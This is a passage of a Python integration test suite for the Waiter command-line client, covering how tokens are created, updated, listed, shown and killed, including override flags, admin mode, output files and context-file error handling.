util.delete_token(self.waiter_url, token_name)
def test_kill_bogus_service_id(self):
cp = cli.kill(self.waiter_url, uuid.uuid4(), kill_flags='--service-id')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('No matching data found', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
def test_kill_inactive_service_id(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
service_id = util.ping_token(self.waiter_url, token_name)
util.kill_services_using_token(self.waiter_url, token_name)
self.assertEqual(0, len(util.services_for_token(self.waiter_url, token_name)))
cp = cli.kill(self.waiter_url, service_id, kill_flags='--service-id')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('cannot be killed because it is already Inactive', cli.stdout(cp))
self.assertNotIn('Pinging service', cli.stdout(cp))
self.assertNotIn('Pinging token', cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def __test_init_basic(self, file_format):
token_name = self.token_name()
filename = str(uuid.uuid4())
flags = f"--cmd '{util.default_cmd()}' --cmd-type shell --health-check-url /status " \
f"--name {token_name} --{file_format} --file {filename} "
cp = cli.init(self.waiter_url, init_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(f'Writing token {file_format.upper()}', cli.stdout(cp))
try:
token_definition = util.load_file(file_format, filename)
self.logger.info(f'Token definition: {cli.dump(file_format, token_definition)}')
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertEqual(token_name, token['name'])
self.assertEqual('your-metric-group', token['metric-group'])
self.assertEqual('shell', token['cmd-type'])
self.assertEqual(util.default_cmd(), token['cmd'])
self.assertEqual('your version', token['version'])
self.assertEqual(0.1, token['cpus'])
self.assertEqual(2048, token['mem'])
self.assertEqual('/status', token['health-check-url'])
self.assertEqual(120, token['concurrency-level'])
self.assertEqual('*', token['permitted-user'])
self.assertEqual(getpass.getuser(), token['run-as-user'])
util.ping_token(self.waiter_url, token_name)
self.assertEqual(1, len(util.services_for_token(self.waiter_url, token_name)))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
finally:
os.remove(filename)
def test_init_basic_json(self):
self.__test_init_basic('json')
def test_init_basic_yaml(self):
self.__test_init_basic('yaml')
def test_implicit_init_args(self):
cp = cli.init(init_flags='--help')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('--cpus', cli.stdout(cp))
self.assertNotIn('--https-redirect', cli.stdout(cp))
self.assertNotIn('--fallback-period-secs', cli.stdout(cp))
self.assertNotIn('--idle-timeout-mins', cli.stdout(cp))
self.assertNotIn('--max-instances', cli.stdout(cp))
self.assertNotIn('--restart-backoff-factor', cli.stdout(cp))
token_name = self.token_name()
with tempfile.NamedTemporaryFile(delete=True) as file:
init_flags = (
'--cmd-type shell '
'--https-redirect true '
'--cpus 0.1 '
'--fallback-period-secs 10 '
'--idle-timeout-mins 1 '
'--max-instances 100 '
'--restart-backoff-factor 1.1 '
f'--file {file.name} '
'--force')
cp = cli.init(self.waiter_url, init_flags=init_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_definition = util.load_file('json', file.name)
self.logger.info(f'Token definition: {json.dumps(token_definition, indent=2)}')
util.post_token(self.waiter_url, token_name, token_definition)
try:
token = util.load_token(self.waiter_url, token_name)
self.assertEqual('your command', token['cmd'])
self.assertEqual('shell', token['cmd-type'])
self.assertEqual('your version', token['version'])
self.assertEqual(0.1, token['cpus'])
self.assertEqual(2048, token['mem'])
self.assertTrue(token['https-redirect'])
self.assertEqual(10, token['fallback-period-secs'])
self.assertEqual(1, token['idle-timeout-mins'])
self.assertEqual(100, token['max-instances'])
self.assertEqual(1.1, token['restart-backoff-factor'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_init_existing_file(self):
with tempfile.NamedTemporaryFile(delete=True) as file:
self.assertTrue(os.path.isfile(file.name))
cp = cli.init(self.waiter_url, init_flags=f"--cmd '{util.default_cmd()}' --file {file.name}")
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('There is already a file', cli.stderr(cp))
cp = cli.init(self.waiter_url, init_flags=f"--cmd '{util.default_cmd()}' --file {file.name} --force")
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('Writing token JSON', cli.stdout(cp))
@pytest.mark.xfail
def test_show_services_using_token(self):
token_name = self.token_name()
custom_fields = {
'permitted-user': getpass.getuser(),
'run-as-user': getpass.getuser(),
'cpus': 0.1,
'mem': 128
}
service_description_1 = util.minimal_service_description(**custom_fields)
util.post_token(self.waiter_url, token_name, service_description_1)
try:
# Create 2 services, 1 running and 1 failing due to a bad command
service_id_1 = util.ping_token(self.waiter_url, token_name)
custom_fields['cmd'] = 'exit 1'
custom_fields['cpus'] = 0.2
custom_fields['mem'] = 256
service_description_2 = util.minimal_service_description(**custom_fields)
util.post_token(self.waiter_url, token_name, service_description_2)
service_id_2 = util.ping_token(self.waiter_url, token_name, expected_status_code=503)
# Run show with --json
cp, services = cli.show_token_services('json', self.waiter_url, token_name=token_name)
self.logger.info(f'Services: {json.dumps(services, indent=2)}')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(2, len(services), services)
service_1 = next(s for s in services if s['service-id'] == service_id_1)
service_2 = next(s for s in services if s['service-id'] == service_id_2)
self.assertEqual(service_description_1, service_1['service-description'])
self.assertEqual(service_description_2, service_2['service-description'])
self.assertEqual('Running', service_1['status'])
self.assertIn(service_2['status'], ['Failing', 'Starting'])
# Run show without --json
cp = cli.show(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search('^# Services\\s+2$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^# Failing\\s+([01])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^# Instances\\s+([12])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^Total Memory\\s+(128|384) MiB$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search('^Total CPUs\\s+0\\.([13])$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_1}.+Running.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_2}.+(Failing|Starting).+Current$',
cli.stdout(cp), re.MULTILINE))
# Run show without --json and with --no-services
cp = cli.show(self.waiter_url, token_name, show_flags='--no-services')
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertNotIn('# Services', cli.stdout(cp))
self.assertNotIn('# Failing', cli.stdout(cp))
self.assertNotIn('# Instances', cli.stdout(cp))
self.assertNotIn('Total Memory', cli.stdout(cp))
self.assertNotIn('Total CPUs', cli.stdout(cp))
self.assertNotIn(service_id_1, cli.stdout(cp))
self.assertNotIn(service_id_2, cli.stdout(cp))
finally:
util.delete_token(self.waiter_url, token_name, kill_services=True)
def test_tokens_basic(self):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description())
try:
# Ensure that tokens lists our token
cp, tokens = cli.tokens_data(self.waiter_url)
token_data = next(t for t in tokens if t['token'] == token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertFalse(token_data['deleted'])
self.assertFalse(token_data['maintenance'])
# Delete the token
util.delete_token(self.waiter_url, token_name)
# Ensure that tokens does not list our token
cp, tokens = cli.tokens_data(self.waiter_url)
# The CLI returns 0 if there are any tokens
# owned by the user and 1 if there are none
self.assertIn(cp.returncode, [0, 1], cp.stderr)
self.assertFalse(any(t['token'] == token_name for t in tokens))
finally:
util.delete_token(self.waiter_url, token_name, assert_response=False)
def __test_tokens_maintenance(self, expected_maintenance_value, service_config=None):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, util.minimal_service_description(**(service_config or {})))
try:
cp = cli.tokens(self.waiter_url)
stdout = cli.stdout(cp)
lines = stdout.split('\n')
title_line = lines[0]
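# The `tokens` command prints a fixed-width table, so the Maintenance value for our
# token is recovered by slicing its row at the column offset of the 'Maintenance' header.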
maintenance_index = title_line.index('Maintenance')
line_with_token = next(line for line in lines if token_name in line)
token_maintenance = line_with_token[maintenance_index:maintenance_index + len(expected_maintenance_value)]
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertEqual(token_maintenance, expected_maintenance_value)
finally:
util.delete_token(self.waiter_url, token_name)
def test_tokens_token_in_maintenance(self):
service_config = {"maintenance": {"message": "custom message"}}
self.__test_tokens_maintenance("True", service_config=service_config)
def test_tokens_token_not_in_maintenance(self):
self.__test_tokens_maintenance("False")
def test_tokens_sorted(self):
token_name_prefix = self.token_name()
token_name_1 = f'{token_name_prefix}_foo'
util.post_token(self.waiter_url, token_name_1, util.minimal_service_description())
try:
token_name_2 = f'{token_name_prefix}_bar'
util.post_token(self.waiter_url, token_name_2, util.minimal_service_description())
try:
cp = cli.tokens(self.waiter_url)
stdout = cli.stdout(cp)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn(token_name_1, stdout)
self.assertIn(token_name_2, stdout)
self.assertLess(stdout.index(token_name_2), stdout.index(token_name_1))
finally:
util.delete_token(self.waiter_url, token_name_2)
finally:
util.delete_token(self.waiter_url, token_name_1)
def __test_create_token_containing_token_name(self, file_format):
token_name = self.token_name()
with cli.temp_token_file({'token': token_name, 'cpus': 0.1, 'mem': 128}, file_format) as path:
cp = cli.create(self.waiter_url, create_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_token_json_containing_token_name(self):
self.__test_create_token_containing_token_name('json')
def test_create_token_yaml_containing_token_name(self):
self.__test_create_token_containing_token_name('yaml')
def test_create_nested_args_no_override(self):
token_name = self.token_name()
try:
create_flags = f'{token_name} --metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_env_metadata_are_parsed_as_strings(self):
token_name = self.token_name()
try:
create_flags = f'{token_name} --metadata.instances 5 --env.KEY_2 true --env.KEY_3 false'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual({'KEY_2': 'true',
'KEY_3': 'false'},
token_data['env'])
self.assertEqual({'instances': '5'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_nested_args_parameter_override_success(self, file_format, create_existing_token=False):
token_name = self.token_name()
create_doc = {'token': token_name,
'cpus': 0.2,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'}}
if create_existing_token:
util.post_token(self.waiter_url, token_name, {'env': {'key': 'should_be_overridden'}})
try:
with cli.temp_token_file(create_doc, file_format) as path:
explicit_create_flags = '--metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
create_flags = f'--override {explicit_create_flags} --{file_format} {path}'
cp = cli.create(self.waiter_url, flags='--verbose', create_flags=create_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual({'KEY_1': 'value_1',
'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_create_nested_args_json_parameter_override_success(self):
self.__test_create_nested_args_parameter_override_success('json')
def test_create_nested_args_yaml_parameter_override_success(self):
self.__test_create_nested_args_parameter_override_success('yaml')
def test_create_nested_args_parameter_override_success_with_existing_token(self):
self.__test_create_nested_args_parameter_override_success('json', create_existing_token=True)
def __test_update_token_containing_token_name(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
with cli.temp_token_file({'token': token_name, 'cpus': 0.2, 'mem': 256}, file_format) as path:
cp = cli.update(self.waiter_url, update_flags=f'--{file_format} {path}')
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_containing_token_name(self):
self.__test_update_token_containing_token_name('json')
def test_update_token_yaml_containing_token_name(self):
self.__test_update_token_containing_token_name('yaml')
def __test_update_token_override_fail(self, file_format):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
with cli.temp_token_file({'token': token_name, 'cpus': 0.2, 'mem': 256}, file_format) as path:
cp = cli.update(self.waiter_url, update_flags=f'--cpus 0.3 --{file_format} {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'You cannot specify the same parameter in both an input file ' \
'and token field flags at the same time'
self.assertIn(err_msg, stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_override_fail(self):
self.__test_update_token_override_fail('json')
def test_update_token_yaml_override_fail(self):
self.__test_update_token_override_fail('yaml')
def __test_update_token_override_success(self, file_format, diff_token_in_file):
token_name = self.token_name()
util.post_token(self.waiter_url, token_name, {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'})
try:
token_in_file = f'abc_{token_name}' if diff_token_in_file else token_name
with cli.temp_token_file({'token': token_in_file, 'cpus': 0.2, 'mem': 256}, file_format) as path:
update_flags = f'--override --cpus 0.3 --{file_format} {path}'
if diff_token_in_file:
update_flags = f'{update_flags} {token_name}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.3, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_parameter_override_success(self):
self.__test_update_token_override_success('json', False)
def test_update_token_yaml_parameter_override_success(self):
self.__test_update_token_override_success('yaml', False)
def test_update_token_json_token_override_success(self):
self.__test_update_token_override_success('json', True)
def test_update_token_yaml_token_override_success(self):
self.__test_update_token_override_success('yaml', True)
def __test_update_token_override_failure(self, file_format, diff_token_in_file, update_flags="--cpus 0.3"):
token_name = self.token_name()
token_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo', 'env': {'FOO': 'BAR'}}
util.post_token(self.waiter_url, token_name, token_fields)
try:
token_in_file = f'abc_{token_name}' if diff_token_in_file else token_name
with cli.temp_token_file({'token': token_in_file, **token_fields}, file_format) as path:
update_flags = f'--no-override {update_flags} --{file_format} {path}'
if diff_token_in_file:
update_flags = f'{update_flags} {token_name}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = 'You cannot specify the same parameter'
self.assertIn(err_msg, stderr)
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_json_parameter_override_failure(self):
self.__test_update_token_override_failure('json', False)
def test_update_token_yaml_parameter_override_failure(self):
self.__test_update_token_override_failure('yaml', False)
def test_update_token_json_token_override_failure(self):
self.__test_update_token_override_failure('json', True)
def test_update_token_yaml_token_override_failure(self):
self.__test_update_token_override_failure('yaml', True)
def test_post_token_over_specified_token_name(self):
token_name = self.token_name()
with cli.temp_token_file({'token': token_name}) as path:
cp = cli.create(self.waiter_url, token_name, create_flags=f'--json {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('cannot specify the token name both as an argument and in the input file',
cli.stderr(cp))
def test_post_token_no_token_name(self):
cp = cli.create(self.waiter_url)
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify the token name', cli.stderr(cp))
with cli.temp_token_file({'cpus': 0.1}) as path:
cp = cli.create(self.waiter_url, create_flags=f'--json {path}')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('must specify the token name', cli.stderr(cp))
def test_implicit_args_lenient_parsing(self):
token_name = self.token_name()
cp = cli.create(self.waiter_url, token_name, create_flags='--cpus 0.1 --foo-level HIGH --bar-rate LOW')
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Unsupported key(s)', cli.stderr(cp))
self.assertIn('foo-level', cli.stderr(cp))
self.assertIn('bar-rate', cli.stderr(cp))
def test_update_nested_args_no_override(self):
token_name = self.token_name()
initial_token_config = {'cmd': 'foo',
'cpus': 0.1,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'},
'mem': 128}
util.post_token(self.waiter_url, token_name, initial_token_config)
try:
update_flags = f'{token_name} --metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.1, token_data['cpus'])
self.assertEqual(128, token_data['mem'])
self.assertEqual('foo', token_data['cmd'])
self.assertEqual({'KEY_1': 'value_1',
'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def __test_update_nested_args_with_overrides_success(self, file_format):
token_name = self.token_name()
initial_token_config = {'cmd': 'foo',
'cpus': 0.1,
'env': {'KEY_1': 'value_1',
'KEY_2': 'value_2'},
'mem': 128}
token_update_doc = {'token': token_name,
'cpus': 0.2,
'mem': 256,
'metadata': {'key1': 'value1'}}
explicit_update_flags = '--metadata.foo bar --env.KEY_2 new_value_2 --env.KEY_3 new_value_3'
util.post_token(self.waiter_url, token_name, initial_token_config)
try:
with cli.temp_token_file(token_update_doc, file_format) as path:
update_flags = f'--override {explicit_update_flags} --{file_format} {path}'
cp = cli.update(self.waiter_url, flags='--verbose', update_flags=update_flags)
self.assertEqual(0, cp.returncode, cp.stderr)
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0.2, token_data['cpus'])
self.assertEqual(256, token_data['mem'])
# --override with an input file performs a shallow merge, so nested maps like 'env' are replaced rather than deep-merged
self.assertEqual({'KEY_2': 'new_value_2',
'KEY_3': 'new_value_3'},
token_data['env'])
self.assertEqual({'foo': 'bar',
'key1': 'value1'},
token_data['metadata'])
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_nested_args_json_with_overrides_success(self):
self.__test_update_nested_args_with_overrides_success('json')
def test_update_nested_args_yaml_with_overrides_success(self):
self.__test_update_nested_args_with_overrides_success('yaml')
def test_update_nested_args_json_with_overrides_failure(self):
self.__test_update_token_override_failure('json', False, update_flags="--env.FOO testing")
def test_update_nested_args_yaml_with_overrides_failure(self):
self.__test_update_token_override_failure('yaml', False, update_flags="--env.FOO testing")
def test_show_service_current(self):
token_name_1 = self.token_name()
token_name_2 = self.token_name()
iso_8601_time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
custom_fields = {
'owner': getpass.getuser(),
'cluster': 'test_show_service_current',
'root': 'test_show_service_current',
'last-update-user': getpass.getuser(),
'last-update-time': iso_8601_time
}
token_definition = util.minimal_service_description(**custom_fields)
# Post two identical tokens with different names
util.post_token(self.waiter_url, token_name_1, token_definition, update_mode_admin=True, assert_response=False)
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True, assert_response=False)
try:
# Assert that their etags match
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertEqual(etag_1, etag_2)
# Create service A from the two tokens
service_id_a = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# Update token #2 only and assert that their etags don't match
token_definition['cpus'] += 0.1
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertNotEqual(etag_1, etag_2)
# Create service B from the two tokens
service_id_b = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# Update token #1 to match token #2 and assert that their etags match
util.post_token(self.waiter_url, token_name_1, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertEqual(etag_1, etag_2)
# Update token #2 only and assert that their etags don't match
token_definition['cpus'] += 0.1
util.post_token(self.waiter_url, token_name_2, token_definition, update_mode_admin=True,
assert_response=False, etag=etag_1)
etag_1 = util.load_token_with_headers(self.waiter_url, token_name_1)[1]['ETag']
etag_2 = util.load_token_with_headers(self.waiter_url, token_name_2)[1]['ETag']
self.assertNotEqual(etag_1, etag_2)
# Create service C from the two tokens
service_id_c = util.ping_token(self.waiter_url, f'{token_name_1},{token_name_2}')
# For both tokens, only service C should be "current"
cp = cli.show(self.waiter_url, token_name_1)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search(f'^{service_id_a}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_b}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_c}.+Current$', cli.stdout(cp), re.MULTILINE))
cp = cli.show(self.waiter_url, token_name_2)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIsNotNone(re.search(f'^{service_id_a}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_b}.+Not Current$', cli.stdout(cp), re.MULTILINE))
self.assertIsNotNone(re.search(f'^{service_id_c}.+Current$', cli.stdout(cp), re.MULTILINE))
finally:
util.delete_token(self.waiter_url, token_name_1, kill_services=True)
util.delete_token(self.waiter_url, token_name_2, kill_services=True)
def test_create_token_output_stdout(self):
token_name = self.token_name()
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'--output - --{file_format} -'
try:
cp = cli.create(self.waiter_url, token_name, flags='-v', stdin=stdin, create_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name, expected_status_code=404)
stdout = cli.stdout(cp)
self.assertIn('Token configuration (as json) is:', stdout)
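# Everything after the final 'is:' marker in stdout is the token configuration the
# CLI printed as JSON; parse it and compare against the fields supplied on stdin.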
json_str = stdout[(stdout.rindex('is:') + 3):]
printed_token_fields = json.loads(json_str)
self.assertEqual(token_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name, expected_status_code=404)
def test_create_token_output_json(self):
token_name = self.token_name()
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
try:
with tempfile.NamedTemporaryFile(delete=True, suffix='.json') as output_file:
flags = f'--output {output_file.name} --{file_format} -'
cp = cli.create(self.waiter_url, token_name, flags='-v', stdin=stdin, create_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name, expected_status_code=404)
stdout = cli.stdout(cp)
self.assertIn(f'Writing token configuration (as json) to {output_file.name}', stdout)
printed_token_fields = util.load_file('json', output_file.name)
self.assertEqual(token_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name, expected_status_code=404)
def test_update_token_output_stdout(self):
token_name = self.token_name()
base_fields = {
'cpus': 1.0,
'health-check-url': '/health',
'permitted-user': '*'
}
util.post_token(self.waiter_url, token_name, base_fields)
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'--output - --{file_format} -'
try:
cp = cli.update(self.waiter_url, token_name, flags='-v', stdin=stdin, update_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name)
stdout = cli.stdout(cp)
self.assertIn('Token configuration (as json) is:', stdout)
json_str = stdout[(stdout.rindex('is:') + 3):]
printed_token_fields = json.loads(json_str)
expected_fields = {**base_fields, **token_fields, 'owner': getpass.getuser()}
self.assertEqual(expected_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name)
def test_update_token_output_yaml(self):
token_name = self.token_name()
base_fields = {
'cpus': 1.0,
'health-check-url': '/health',
'permitted-user': '*'
}
util.post_token(self.waiter_url, token_name, base_fields)
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
try:
with tempfile.NamedTemporaryFile(delete=True, suffix='.yaml') as output_file:
flags = f'--output {output_file.name} --{file_format} -'
cp = cli.update(self.waiter_url, token_name, flags='-v', stdin=stdin, update_flags=flags)
self.assertEqual(0, cp.returncode, cp.stderr)
util.load_token(self.waiter_url, token_name)
stdout = cli.stdout(cp)
self.assertIn(f'Writing token configuration (as yaml) to {output_file.name}', stdout)
printed_token_fields = util.load_file('yaml', output_file.name)
expected_fields = {**base_fields, **token_fields, 'owner': getpass.getuser()}
self.assertEqual(expected_fields, printed_token_fields)
finally:
util.delete_token(self.waiter_url, token_name)
def __test_create_update_token_admin_mode(self, action, token_name, admin_mode):
token_fields = {
'cpus': 0.2,
'mem': 256,
'run-as-user': 'FAKE_USERNAME'
}
file_format = 'yaml'
stdin = cli.dump(file_format, token_fields)
flags = f'{"--admin " if admin_mode else ""}--{file_format} -'
temp_env = os.environ.copy()
temp_env["WAITER_ADMIN"] = 'true'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', stdin=stdin, env=temp_env,
**{f'{action}_flags': flags})
if admin_mode:
try:
token_data = util.load_token(self.waiter_url, token_name)
self.assertEqual(0, cp.returncode, cp.stderr)
self.assertIn('update-mode=admin', cli.stderr(cp))
self.assertIn(f'Attempting to {action} token in ADMIN mode', cli.stdout(cp))
for key, value in token_fields.items():
self.assertEqual(value, token_data[key])
finally:
util.delete_token(self.waiter_url, token_name)
else:
self.assertEqual(1, cp.returncode, cp.stderr)
self.assertIn('Cannot run as user: FAKE_USERNAME', cli.decode(cp.stderr))
def test_create_token_admin_mode(self):
self.__test_create_update_token_admin_mode('create', self.token_name(), True)
def test_create_token_no_admin_mode(self):
self.__test_create_update_token_admin_mode('create', self.token_name(), False)
def test_update_token_admin_mode(self):
token_name = self.token_name()
create_fields = {'cpus': 0.1, 'mem': 128, 'cmd': 'foo'}
util.post_token(self.waiter_url, token_name, create_fields)
self.__test_create_update_token_admin_mode('update', token_name, True)
def test_update_token_no_admin_mode(self):
self.__test_create_update_token_admin_mode('update', self.token_name(), False)
def __test_create_update_token_context_missing_data_failure(self, action):
token_name = self.token_name()
context_fields = {'fee': 'bar', 'fie': 'baz', 'foe': 'fum'}
try:
with cli.temp_token_file({**context_fields}, 'yaml') as path:
flags = f'--context {path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = '--context file can only be used when a data file is specified via --input, --json, or --yaml'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_data_failure(self):
self.__test_create_update_token_context_missing_data_failure('create')
def test_update_token_context_missing_data_failure(self):
self.__test_create_update_token_context_missing_data_failure('update')
def __test_create_update_token_context_missing_file_failure(self, action, file_format):
token_name = self.token_name()
token_fields = {'cmd': 'foo-bar', 'cpus': 0.2, 'mem': 256}
try:
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with tempfile.NamedTemporaryFile(delete=True) as file:
flags = f'--context {file.name} --{file_format} {token_path}'
cp = getattr(cli, action)(self.waiter_url, token_name, flags='-v', **{f'{action}_flags': flags})
self.assertEqual(1, cp.returncode, cp.stderr)
stderr = cli.stderr(cp)
err_msg = f'Unable to load context from {file.name}'
self.assertIn(err_msg, stderr)
finally:
# the token should not have been created, but cleaning up in case the test failed
util.delete_token(self.waiter_url, token_name, assert_response=False)
def test_create_token_context_missing_file_failure_json_data(self):
self.__test_create_update_token_context_missing_file_failure('create', 'json')
def test_create_token_context_missing_file_failure_yaml_data(self):
self.__test_create_update_token_context_missing_file_failure('create', 'yaml')
def test_update_token_context_missing_file_failure_json_data(self):
self.__test_create_update_token_context_missing_file_failure('update', 'json')
def test_update_token_context_missing_file_failure_yaml_data(self):
self.__test_create_update_token_context_missing_file_failure('update', 'yaml')
def __test_create_update_token_context_bad_format_failure(self, action, file_format):
token_name = self.token_name()
token_fields = {'cmd': 'foo-bar', 'cpus': 0.2, 'mem': 256}
try:
with cli.temp_token_file({**token_fields}, file_format) as token_path:
with cli.temp_file('foo-bar') as context_path:
flags = f'--context {context_path} --{file_format} {token_path}'
